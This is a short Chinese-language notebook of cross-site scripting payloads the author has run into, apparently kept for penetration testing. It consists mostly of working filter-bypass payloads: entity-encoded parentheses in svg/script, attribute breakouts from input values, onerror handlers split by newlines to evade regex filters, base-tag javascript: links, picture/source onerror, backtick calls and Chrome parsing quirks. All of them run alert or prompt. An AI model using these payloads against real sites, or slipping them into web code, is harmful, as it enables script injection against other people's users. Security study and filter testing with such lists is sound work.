记录碰到过的 XSS

  1. ()=被过滤<svg>实体编码
<svg><script>alert&#40/1/&#41</script>      // Works With All Browsers
( is html encoded to &#40
) is html encoded to &#41
  1. 浏览器 Prasing 先闭合再找新标签
<input type="text" value='<SCRIPT>alert("XSS")</SCRIPT>' />
  1. <input value="'输出点'" type="text" /> XSS_payload=
    "type=&#105;&#109;&#97;&#103;&#101; src onerror ="prompt(1)

x---------onerror 和=之间换行仍然可以解析,----------可以绕过正则---------

  1. <input type="text" autofocus=alert(/xss/)>
  2. chrome base 标签,不可覆盖
<base href="javascript:\" /><a href="//%0aalert(1);//">Click Me</a>
  1. img source 可分开写
<picture
  ><source srcset="1" />
  <img onerror="alert(1)" />
</picture>
  1. ES6 backtick `
<script>
  alert`1`
</script>
  1. Chrome Only
<img src ?itworksonchrome?\/onerror = alert(1)> <img/src/onerror=alert(1)>
  1. <svg/onload=alert/**/(1)>
  2. <svg onload="alert(1)"></svg>
  3. JS 中
;(function() {
  alert(1)
})() //OK

alert(1) //OK

aler
t(1) //aler Not defined
  1. img 利用
<p class="comment" title=""><img src="></p>
<p class="comment" title=""onerror='/*"></p>
<p class="comment" title="*/prompt(1)'"></p>

部分 Reference

核总 hookjoy